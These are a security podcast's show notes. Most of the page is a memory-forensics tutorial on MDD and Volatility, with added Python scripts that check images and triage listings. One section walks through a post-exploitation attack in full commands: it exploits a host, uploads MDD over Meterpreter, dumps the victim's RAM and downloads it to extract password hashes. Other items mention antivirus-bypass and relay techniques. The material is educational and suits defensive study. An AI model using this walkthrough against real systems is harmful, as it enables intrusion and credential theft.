Episode 142

From Paul's Security Weekly

Sponsors

  • Tenable Network Security - This episode is sponsored by Tenable Network Security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the world's best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the world's best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!


Announcements & Shameless Plugs

Welcome to PaulDotCom Security Weekly, Episode 142, recording Thursday February 26th, 2009

You can find out about all of our events at http://pauldotcom.com/events/

  • commandlinekungfu.com - Ed Skoudis, Hal Pomeranz and the PaulDotCom team have teamed up to bring you a new blog that focuses on command-line tips and tricks for Windows, Linux and Mac OS X.

Episode Media

mp3

Special Guest: Marcus Carey

Marcus J. Carey is the founder of Sun Tzu Data, a Mid-Atlantic based information technology firm which specializes in network engineering, network defense strategies, and incident response.

Prior to starting Sun Tzu Data, Marcus was employed by Computer Sciences Corp. (CSC) Global Security Solutions (GSS) organization. Marcus was assigned to the DC3's Defense Cyber Crime Investigations Training Academy (DCITA) as a Researcher and Instructor. Marcus' specialty at DCITA was Network Intrusions, Log Analysis, and Data Forensics.

Marcus served over eight years in the U.S. Navy Cryptologic Security Group. Marcus ended his naval service by being assigned to the National Security Agency (NSA), where he engineered, monitored, and defended the Department of Defense's secure networks. Marcus has also earned a Master of Science in Network Security from Capitol College in Laurel, Maryland.

Reality Security Blog - Marcus' Blog

DojoSec

DojoSec - DojoSec is an exclusive Information Assurance Briefing and Training community founded by Marcus J. Carey. DojoSec is popular for its monthly briefings which provide a sampling of a major security conference in one night. DojoSec’s Monthly Briefings audience has seen talks by Johnny Long, Ron Gula, Joseph McCray, and Bruce Potter to name a few speakers. Attendees enjoy technical demonstrations, industry expert speakers, and a meal. It’s like a dinner theater for security geeks!

DojoSec Multimedia Archive - Video from past DojoSec events

Memory Analysis: The Good vs. The Bad

By Marcus J. Carey

Memory analysis is at the bleeding edge of incident response and data forensics. It lets a first responder image a system's memory, which can reveal artifacts left by an intruder: running processes, network connections and executables that may never have touched the disk. Like many good security practices, memory analysis can also be used by the bad guys.

Imaging Memory with MDD

ManTech Memory DD (MDD) is released under the GPL by ManTech International. MDD copies the complete contents of physical memory on the following Microsoft operating systems: Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2008. It loads a kernel driver to read physical memory, so it has to be run from an account with administrator rights. Running any tool on the suspect system changes some of that system's memory, and writing the image to its own disk overwrites deleted data there, so keep the footprint small and, where possible, write the image to removable media you brought with you.

After downloading MDD from the ManTech site, run it from a command prompt.

MDD Command Line Usage:

mdd -o OUTPUTFILENAME

Example:


C:\tools\mdd>mdd -o memory.dd
 -> mdd
 -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance

 -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it
    under certain conditions; use option `-c' for details.

 -> Dumping 255.48 MB of physical memory to file 'memory.dd'.


 65404 map operations succeeded (1.00)
 0 map operations failed

 took 21 seconds to write
 MD5 is: a48986bb0558498684414e9399ca19fc

The output file is commonly referred to as an "image". Record the MD5 that MDD prints at the end of the run together with the page counts: that hash is what later analysts compare against to show the image was not altered after capture. MDD only copies physical memory, so you will have to use another tool to analyze the image.
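The check an examiner wants before handing an MDD image to anyone is that the file on disk is the complete, unmodified image MDD reported. The following is an added example (not part of MDD or the original article) that ties the image back to MDD's own summary: one map operation is one 4 KB page, so the file size must equal successful pages times 4096, the "Dumping N MB" figure must agree with that, and the MD5 must match. It assumes MDD's console output was saved alongside the image (plain shell redirection, e.g. mdd -o memory.dd > mdd.log, not an MDD feature); the demo() function builds a small constructed image to exercise the checks offline.

```python
"""Tie an MDD memory image back to the summary MDD printed when it was taken.

Added example; not part of MDD or the original article. MDD copies physical
memory one 4 KB page per "map operation" and prints the page counts, the
size dumped and an MD5 at the end of the run. The checks below use those
numbers to confirm the file on disk is the complete, unmodified image.
"""
import hashlib
import os
import re
import tempfile

PAGE_SIZE = 4096  # one map operation == one 4 KB physical page

# Lines of interest in MDD's console output, e.g.
#  -> Dumping 255.48 MB of physical memory to file 'memory.dd'.
#  65404 map operations succeeded (1.00)
#  0 map operations failed
#  MD5 is: a48986bb0558498684414e9399ca19fc
_RE_DUMP = re.compile(r"Dumping ([\d.]+) MB of physical memory to file '([^']+)'")
_RE_OK = re.compile(r"(\d+) map operations succeeded")
_RE_FAIL = re.compile(r"(\d+) map operations failed")
_RE_MD5 = re.compile(r"MD5 is: ([0-9a-fA-F]{32})")


def parse_mdd_output(text):
    """Extract the fields the checks need from MDD's console output."""
    info = {}
    m = _RE_DUMP.search(text)
    if m:
        info["reported_mb"] = float(m.group(1))
        info["filename"] = m.group(2)
    for key, rx in (("pages_ok", _RE_OK), ("pages_failed", _RE_FAIL)):
        m = rx.search(text)
        if m:
            info[key] = int(m.group(1))
    m = _RE_MD5.search(text)
    if m:
        info["md5"] = m.group(1).lower()
    return info


def md5_file(path, chunk=1 << 20):
    """Hash in 1 MB chunks; a multi-GB image must not be read into memory whole."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_image(path, mdd_output):
    """Return (ok, findings); any finding means the image should not be trusted as-is."""
    info = parse_mdd_output(mdd_output)
    missing = [k for k in ("pages_ok", "pages_failed", "md5") if k not in info]
    if missing:
        return False, ["MDD output incomplete, missing: " + ", ".join(missing)]
    findings = []
    if info["pages_failed"]:
        findings.append("%d map operations failed: image has unreadable pages" % info["pages_failed"])
    expected = info["pages_ok"] * PAGE_SIZE
    actual = os.path.getsize(path)
    if actual != expected:
        findings.append("size %d != %d pages * %d = %d" % (actual, info["pages_ok"], PAGE_SIZE, expected))
    # MDD prints the size rounded to two decimals, hence the tolerance.
    if "reported_mb" in info and abs(expected / float(1 << 20) - info["reported_mb"]) >= 0.01:
        findings.append("reported %.2f MB does not match %d pages" % (info["reported_mb"], info["pages_ok"]))
    digest = md5_file(path)
    if digest != info["md5"]:
        findings.append("MD5 %s != recorded %s" % (digest, info["md5"]))
    return not findings, findings


def demo():
    """Constructed 3-page image plus a matching MDD-style summary, then one flipped byte."""
    data = bytes(range(256)) * (3 * PAGE_SIZE // 256)
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "memory.dd")
        with open(path, "wb") as f:
            f.write(data)
        summary = (
            " -> Dumping %.2f MB of physical memory to file 'memory.dd'.\n"
            " %d map operations succeeded (1.00)\n 0 map operations failed\n"
            " MD5 is: %s\n" % (len(data) / float(1 << 20), 3, hashlib.md5(data).hexdigest())
        )
        clean = verify_image(path, summary)
        with open(path, "r+b") as f:
            f.seek(PAGE_SIZE + 7)
            f.write(b"\xff")  # tamper with one byte in the second page
        tampered = verify_image(path, summary)
    return clean, tampered


if __name__ == "__main__":
    print(demo())
```

The page counts are worth checking as well as the hash: a run with failed map operations still prints an MD5, but the image has holes, and a size that is not a whole number of pages means the file was truncated or appended to after MDD finished. On the page's own runs the arithmetic holds (65404 pages is 267,894,784 bytes, which MDD reports as 255.48 MB; 130940 pages is 536,330,240 bytes, the memory.dd size shown later in the Meterpreter listing).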

Analyzing Memory with Volatility Framework

Per Volatile Systems "The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples."

Volatility does not work with Windows Vista, but since many enterprises are still running Windows XP it can come in very handy. To practice analyzing memory with Volatility, download the memory samples from NIST's website. The examples that follow use the file "xp-laptop-2005-07-04-1430.img" from that set.

The volatility script ships with a Windows-style interpreter line as its first line:

#!c:\python\python.exe

On Unix/Linux, change that first line to point at the local Python interpreter, for example:

#!/usr/bin/python

then make the script executable:

chmod +x volatility

Running it with no arguments lists the available commands and options:

./volatility

To see date and time of memory image:

bash-3.2# ./volatility datetime -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
Image local date and time: Mon Jul 04 14:30:32 2005

Show the image information (service pack, whether the kernel is PAE or non-PAE, and the DTB, the directory table base Volatility uses for virtual-to-physical address translation):

bash-3.2# ./volatility ident -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
              Image Name: /Volumes/OBI-TOO/Memory Images/xp-laptop-2005-07-04-1430.img
              Image Type: Service Pack 2
                 VM Type: nopae
                     DTB: 0x39000
                Datetime: Mon Jul 04 14:30:32 2005

To obtain a process list, with each process's PID, parent PID, thread and handle counts and creation time. The System process shows the Unix epoch because its creation time is zero; the other times are UTC, while datetime above reports the image's local time, which is why they differ by four hours here:

bash-3.2# ./volatility pslist -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
Name                 Pid    PPid   Thds   Hnds   Time  
System               4      0      62     1133   Thu Jan 01 00:00:00 1970  
smss.exe             400    4      3      21     Mon Jul 04 18:17:26 2005  
csrss.exe            456    400    11     551    Mon Jul 04 18:17:29 2005 

Show active TCP connections (this walks the kernel's live connection list):

bash-3.2# ./volatility connections -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
Local Address             Remote Address            Pid   
127.0.0.1:1037            127.0.0.1:1038            3276  
127.0.0.1:1038            127.0.0.1:1037            3276  

Scan for connection objects anywhere in physical memory. Unlike connections, connscan carves the objects out of memory rather than walking the live list, so it also turns up closed connections, repeated stale copies and the occasional false positive; the entry below with PID 2167698096 is one, and it is a good habit to check every connscan PID against pslist:

bash-3.2# ./volatility connscan -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
Local Address             Remote Address            Pid   
------------------------- ------------------------- ------ 

192.168.2.7:1147          212.58.240.145:80         3276  
192.168.2.7:1145          170.224.8.51:80           368   
3.0.48.2:18776            199.239.137.245:19277     2167698096
127.0.0.1:1038            127.0.0.1:1037            3276  
127.0.0.1:1037            127.0.0.1:1038            3276  
192.168.2.7:1130          216.239.115.140:80        368   
192.168.2.7:1144          170.224.8.51:80           368   
127.0.0.1:1038            127.0.0.1:1037            3276  
127.0.0.1:1038            127.0.0.1:1037            3276  
127.0.0.1:1038            127.0.0.1:1037            3276  
bash-3.2#

Dump each process's executable from memory to executable.PID.exe in the current directory (the listing below shows them landing in the Volatility directory itself; run from a dedicated output directory to keep the dumps separate from the tool):

bash-3.2# ./volatility procdump -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
----
Snip
----
bash-3.2# ls
AUTHORS.txt		executable.1104.exe	executable.1844.exe	executable.2588.exe	executable.524.exe	forensics		vtypes.py
CHANGELOG.txt		executable.1272.exe	executable.1860.exe	executable.2692.exe	executable.536.exe	memory_objects		vtypes.pyc
CREDITS.txt		executable.1356.exe	executable.2196.exe	executable.3128.exe	executable.680.exe	memory_plugins		vutils.py
LEGAL.txt		executable.1380.exe	executable.2392.exe	executable.3192.exe	executable.712.exe	setup.py		vutils.pyc
LICENSE.txt		executable.1440.exe	executable.2456.exe	executable.3256.exe	executable.760.exe	thirdparty
MANIFEST		executable.1484.exe	executable.2472.exe	executable.3276.exe	executable.800.exe	vmodules.py
MANIFEST.in		executable.1548.exe	executable.2480.exe	executable.3300.exe	executable.840.exe	vmodules.pyc
PKG-INFO		executable.1564.exe	executable.2496.exe	executable.400.exe	executable.932.exe	volatility
README.txt		executable.1588.exe	executable.2524.exe	executable.456.exe	executable.972.exe	vsyms.py
README.win		executable.1640.exe	executable.2548.exe	executable.480.exe	executable.992.exe	vsyms.pyc
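A triage pass over the pslist and connscan output above, as an added example (not Volatility's own code and not from the original article). The samples embedded in it are the page's output, trimmed, plus two constructed pslist rows (svchost.exe 368 and iexplore.exe 3276, with made-up parents, counts and start times) so that the PIDs connscan reports have something to match; the expected Windows XP parent chain is an assumption noted in the code. It reports processes whose parent is not what XP's boot chain dictates, connection objects owned by a PID that is not a running process, and traffic to non-loopback hosts.

```python
"""Cross-check Volatility 1.x pslist and connscan output for an XP image.

Added example; not part of Volatility or the original article. Parses the
text the two commands print and reports what an analyst looks at first:
processes whose parent is not what Windows XP's boot chain dictates,
connection objects owned by a PID that is not a running process (closed
connections, stale pool entries or connscan false positives), and traffic
to non-loopback hosts.
"""
import re

# Output from the page, trimmed. The svchost.exe and iexplore.exe rows are
# constructed (the page's listing is cut off) so the connscan PIDs resolve.
PSLIST_SAMPLE = """\
Name                 Pid    PPid   Thds   Hnds   Time
System               4      0      62     1133   Thu Jan 01 00:00:00 1970
smss.exe             400    4      3      21     Mon Jul 04 18:17:26 2005
csrss.exe            456    400    11     551    Mon Jul 04 18:17:29 2005
svchost.exe          368    672    20     300    Mon Jul 04 18:17:40 2005
iexplore.exe         3276   1476   9      280    Mon Jul 04 18:20:11 2005
"""

CONNSCAN_SAMPLE = """\
Local Address             Remote Address            Pid
------------------------- ------------------------- ------
192.168.2.7:1147          212.58.240.145:80         3276
192.168.2.7:1145          170.224.8.51:80           368
3.0.48.2:18776            199.239.137.245:19277     2167698096
127.0.0.1:1038            127.0.0.1:1037            3276
127.0.0.1:1037            127.0.0.1:1038            3276
192.168.2.7:1130          216.239.115.140:80        368
192.168.2.7:1144          170.224.8.51:80           368
127.0.0.1:1038            127.0.0.1:1037            3276
127.0.0.1:1038            127.0.0.1:1037            3276
127.0.0.1:1038            127.0.0.1:1037            3276
"""

PS_ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(.*\S)\s*$")
CONN_ROW = re.compile(r"^(\S+):(\d+)\s+(\S+):(\d+)\s+(\d+)$")

# Windows XP boot chain (assumption, valid for the XP image used above):
# System (PID 4) starts smss.exe; smss.exe spawns csrss.exe and winlogon.exe;
# winlogon.exe starts services.exe and lsass.exe.
EXPECTED_PARENT = {
    "smss.exe": "System",
    "csrss.exe": "smss.exe",
    "winlogon.exe": "smss.exe",
    "services.exe": "winlogon.exe",
    "lsass.exe": "winlogon.exe",
}


def parse_pslist(text):
    """Map PID -> process record from pslist's fixed-width table."""
    procs = {}
    for line in text.splitlines():
        m = PS_ROW.match(line)
        if m is None:  # header, prompt lines and blanks do not match
            continue
        name, pid, ppid, thds, hnds, started = m.groups()
        procs[int(pid)] = {"name": name, "ppid": int(ppid),
                           "threads": int(thds), "handles": int(hnds),
                           "started": started}
    return procs


def parse_connscan(text):
    """Unique (laddr, lport, raddr, rport, pid) tuples.

    connscan carves connection objects out of physical memory rather than
    walking the live list, so it also returns closed connections, repeated
    stale copies and occasional garbage; duplicates are collapsed here and
    garbage is caught later by the PID cross-check.
    """
    rows = set()
    for line in text.splitlines():
        m = CONN_ROW.match(line.strip())
        if m:
            laddr, lport, raddr, rport, pid = m.groups()
            rows.add((laddr, int(lport), raddr, int(rport), int(pid)))
    return sorted(rows)


def triage(pslist_text, connscan_text):
    """Return parent anomalies, connscan PIDs with no process, and external peers."""
    procs = parse_pslist(pslist_text)
    report = {"parent_anomalies": [], "unknown_pids": set(), "external": []}
    for pid, proc in sorted(procs.items()):
        want = EXPECTED_PARENT.get(proc["name"])
        if want is None:
            continue
        parent = procs.get(proc["ppid"])
        if parent is None or parent["name"] != want:
            report["parent_anomalies"].append((pid, proc["name"], proc["ppid"], want))
    for laddr, lport, raddr, rport, pid in parse_connscan(connscan_text):
        if pid not in procs:
            report["unknown_pids"].add(pid)
        elif not raddr.startswith("127."):
            report["external"].append((pid, procs[pid]["name"], "%s:%d" % (raddr, rport)))
    return report


if __name__ == "__main__":
    for key, value in triage(PSLIST_SAMPLE, CONNSCAN_SAMPLE).items():
        print(key, value)
```

On the sample, the bogus PID 2167698096 is the only unknown PID, the three loopback entries for PID 3276 collapse to two unique connections and are ignored, and the four web connections from PIDs 368 and 3276 are what remains to explain. A connscan PID that is absent from pslist is not automatically malicious (the process may simply have exited), but a live process whose parent is wrong is worth pulling with procdump first.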

Check out the SANS Forensics Blog for a great post on finding hidden processes with Mandiant's Memoryze.

Stealing Memory with Metasploit's Meterpreter and MDD

After launching an exploit and receiving a Meterpreter session, upload MDD to the victim. In this example the session's working directory is C:\, so both mdd.exe and the image land in the root of the system drive.

meterpreter > upload /root/mdd.exe .
[*] uploading  : /root/mdd.exe -> .
[*] uploaded   : /root/mdd.exe -> .\mdd.exe
meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified                   Name
----              ----       ----  -------------                   ----
100777/rwxrwxrwx  0          fil   Thu Jan 01 00:00:00 +0000 1970  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   Thu Jan 01 00:00:00 +0000 1970  CONFIG.SYS
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  Documents and Settings
100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  IO.SYS
100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  MSDOS.SYS
100555/r-xr-xr-x  45124      fil   Thu Jan 01 00:00:00 +0000 1970  NTDETECT.COM
40555/r-xr-xr-x   0          dir   Thu Jan 01 00:00:00 +0000 1970  Program Files
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  System Volume Information
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  WINDOWS
100666/rw-rw-rw-  194        fil   Thu Jan 01 00:00:00 +0000 1970  boot.ini
100777/rwxrwxrwx  95104      fil   Thu Jan 01 00:00:00 +0000 1970  mdd.exe
100444/r--r--r--  222368     fil   Thu Jan 01 00:00:00 +0000 1970  ntldr
100666/rw-rw-rw-  402653184  fil   Thu Jan 01 00:00:00 +0000 1970  pagefile.sys

Execute MDD to capture RAM on the victim machine.


meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\>mdd.exe -o memory.dd
mdd.exe -o memory.dd
 -> mdd
 -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance

 -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it
    under certain conditions; use option `-c' for details.

 -> Dumping 511.48 MB of physical memory to file 'memory.dd'.


 130940 map operations succeeded (1.00)
 0 map operations failed

 took 23 seconds to write
 MD5 is: be9d1d906fac99fa01782e847a1c3144

c:\>

Verify that the memory image has been captured. The new memory.dd is 536,330,240 bytes, which is exactly the 130,940 pages MDD reported, times 4 KB.

meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified                   Name
----              ----       ----  -------------                   ----
100777/rwxrwxrwx  0          fil   Thu Jan 01 00:00:00 +0000 1970  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   Thu Jan 01 00:00:00 +0000 1970  CONFIG.SYS
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  Documents and Settings
100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  IO.SYS
100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  MSDOS.SYS
100555/r-xr-xr-x  45124      fil   Thu Jan 01 00:00:00 +0000 1970  NTDETECT.COM
40555/r-xr-xr-x   0          dir   Thu Jan 01 00:00:00 +0000 1970  Program Files
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  System Volume Information
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  WINDOWS
100666/rw-rw-rw-  194        fil   Thu Jan 01 00:00:00 +0000 1970  boot.ini
100777/rwxrwxrwx  95104      fil   Thu Jan 01 00:00:00 +0000 1970  mdd.exe
100666/rw-rw-rw-  536330240  fil   Thu Jan 01 00:00:00 +0000 1970  memory.dd
100444/r--r--r--  222368     fil   Thu Jan 01 00:00:00 +0000 1970  ntldr
100666/rw-rw-rw-  402653184  fil   Thu Jan 01 00:00:00 +0000 1970  pagefile.sys

Download the image over the Meterpreter channel. At half a gigabyte this takes a while and is not subtle on the wire, and mdd.exe and memory.dd remain in C:\ on the victim afterwards, which is exactly the kind of artifact a responder imaging the same box would notice.

meterpreter > download memory.dd .
[*] downloading: memory.dd -> .
[*] downloaded : memory.dd -> ./memory.dd

meterpreter > exit

[*] Meterpreter session 1 closed.
msf exploit(ms06_040_netapi) > ls *.dd
[*] exec: ls *.dd

memory.dd
msf exploit(ms06_040_netapi) >   

Now you can follow the instructions at http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to pull the password hash dump out of the image.

Resources

Tech Segment: Metasploit Cheat Sheet

Metasploit Cheat Sheet - Based on my recent teaching of the Metasploit course for SANS, this is a collection of tips and tricks for Metasploit. Many have been discussed on the podcast before, and some have not. I've included mini-tutorials and links to tech segments on:

  • "Karmetasploit"
  • WPAD Mitm Attacks and smb_relay
  • Incognito Token Passing
  • Bypassing Anti-Virus with msfpayload and msfencode
  • Meterpreter information gathering extensions (Darkoperator)
  • db_autopwn usage and tips

I think I may replace the screenshots with actual text so people can copy and paste, but on the other hand it's good practice to enter the commands manually.

Additional Resources

www.oldapps.com - Repository of older applications available for free download.

Stories For Discussion

1) Bill proposes ISPs, Wi-Fi keep logs for police - [PSW] - Proposed federal law that would require ISPs, hotels, Wi-Fi hot spots, and home users to keep user records for two years to aid police investigations.

2) WHY Netgear, WHY! - [Larry] - Wow, this is a trivial admin interface DoS. How trivial? Add a "?" to the end of the admin URL, and the interface becomes unavailable until a reboot. The device still functions, but there is no way to manage it.

3) Shame on Cisco - [Larry] - Nice, want to manage the ACE Application Control Engine Device Manager remotely? It should be easy, as Cisco included default usernames and passwords for the application and the MySQL database backend. During install, there is no prompting to change them. Wow, being able to take control of a web app load balancer and Cisco 6500 and 7000 series switches has some interesting possibilities for attacks...

4) GPS anyone - [Larry] - I found this use of GPS interesting, given that consumer GPS nav units appear to have been forensically analyzed to determine recorded locations to prosecute folks in crimes. What about utilizing GPS for other information gathering. See next week...

5) SheevaPlug - [Larry] - This looks like a promising platform for a bunch of penetration-type tasks. How about a $50 - $100 Linux box self-contained in a wall-wart form factor, with Ethernet and USB ports available (looks like an SD card slot as well). I can envision using a device like this for remote wireless assessment (hiding a rogue, anyone?) via a USB wireless dongle. How about a pivot point for dropping on a customer LAN?

6) Not just Adobe Reader - [Larry] - A brief analysis of what happens when the new malicious PDFs with malformed JBIG2 streams are thrown at other applications. It looks like crashes are possible with other apps including Preview and Finder under OS X as well as some crashes on the iPhone. Linux analysis coming soon. On another note, disabling JavaScript processing in the reader can help mitigate the issue, but doesn't solve the root of the problem. Here's how to do that. There are also a few third-party patches...some from big names like Sourcefire. I'd like to talk about those third-party patches, and about backing/distribution from reputable companies.

7) MS fixing autorun disable - [Larry] - Thanks, Microsoft. We talked about this during some of our Conficker/Downadup conversations.

8) Web Application Incident Handling - [John] - One of the great tragedies of information security is that it has been reduced to a series of tools that we rely on as professionals. IDS/IPS, SIM, AV... Many of us have become far too dependent on a specific set of tools. The inverse is also true. If there is not a tool that "does it for us" we tend to not look at that specific area of our network. Web applications are no exception. This is a great post by the folks at ts/sci. It will get you started in how to approach your web application logs, and some cool tools to help.

9) Consumer Data Losses: 100 Times Worse According to New Report - [John] - A good read. Don't let all of the statistics and math scare you off. The author is an academic and I don't hold that against him. What I want you to read and focus on is this: many of the reported breaches we deal with are from medium and large organizations. We hear very little about smaller organizations. Is that because they are more secure? I think not.

10) M$ is looking to kill autorun - [John] - We have discussed the various problems of autorun for a few years now. It looks like Conficker/Downadup has pushed MS to the edge. I hate to say it but I am a bit sad. Yeah, it is great for security, but I have used this on quite a few pentests. I know that is selfish.... But.. Sniff...

11) Pwn2Own 2009 style - [John] - The Pwn2Own is up. Basically, you hack it, and you make some money. I like how the surface is being expanded this year. Rather than simply attacking OSes they are going after browsers (which was one of the attack vectors from last year) and.... mobile devices!!! Sweet! I see this as one of the next big areas in IT security. Hopefully, this leads to a bit more exposure to the topic of mobile device security. Looks like CanSecWest will be hopping this year.

12) Digital TV and Personal Information - [John] - Another great blog post from Sherri. Apparently the discount cards they are giving out to people have their names encoded on the mag stripe. But I am sure that the retailers need to protect that data.... Right?

13) Getting To Know Your Inner Command Line Kung Fu - [PaulDotCom] - We've teamed up with some incredibly smart people, Ed Skoudis & Hal Pomeranz, to create the ultimate resource for command line kung fu. The goal is to provide useful commands, be cross-platform, and have each member comment on and improve/modify each other's commands. It's the only site that I've seen attempting to cover commands on each platform. For example, Ed will post a Windows command, then Hal and I will discuss how to do it on UNIX/Linux. We are limiting ourselves to OS commands, with a few exceptions (but no Perl or Windows PowerShell). Props to Byte_Bucket for helping to administer and moderate.

14) Adobe Vulnerability Was Known For Months - [PaulDotCom] - If you are one of the people knocking Sourcefire for posting information about this vulnerability, SHAME on you. When you can provide concrete evidence that the attackers do not have an exploit for a vulnerability, come talk to me. Did you interview all the underground attackers? The argument just doesn't hold water. If a 0day exploit is in the wild, the community needs to know enough information to defend themselves. Hey, sometimes that leads to an exploit that is more prevalent, but at least we can defend ourselves. Keeping 0days a secret only hurts us more; how many people were pwned before this became public? How do you even collect that information on an exploit that's months old? How many people formatted Grandma's computer and had her sign up for fraud alerts in that time? Oh, and then Adobe falls flat on its face and doesn't release a patch, so Sourcefire releases one for them. Just awful!

15) Pwn2Own Mobile Phones Edition - [PaulDotCom] - This is right on. So many people are using mobile phones to browse the web, it's time we brought attention to the vulnerabilities that exist.

16) Cool Command: Connect Mic to remote speaker - [PaulDotCom] - This is a neat little command that will take input from the mic and output it to the speakers of a remote Linux computer. Imagine on a pen test, "I own your computer, to get it back you must dance for me, dance for me fool, dance!" Of course owning the webcam is a must in this situation as well.

17) Wyndham Hotels Hacked - [PaulDotCom] - I love this part: "The breach was the result of an attacker using a "centralised network connection" at one of the franchises, to access and download the information from 41 Wyndham properties." So this means that someone lived near one of these hotels and used the wireless to access the entire corporate network. Or, even better, implanted a device inside the hotel (in the wall jack) and had it provide a reverse shell, and hacked in that way. In either case there are certain organizations, like hotels, that cannot afford to have a chewy center. There is too much at risk, and it's too easy for attackers to gain access to the internal network. They should *completely* separate the guest networks from corporate networks; however, that doesn't stop someone from hacking into a switch, or pwning one of the management computers through some other mechanism (USB thumb drive, wireless).

18) CCCKC Hacking Event - [PaulDotCom] - If you are in KC, you should check this out.

Other Stories of Interest

WiFi Speed Spray (tm) - [IRC] - This revolutionary product is guaranteed to enhance the transfer of computer data through the air.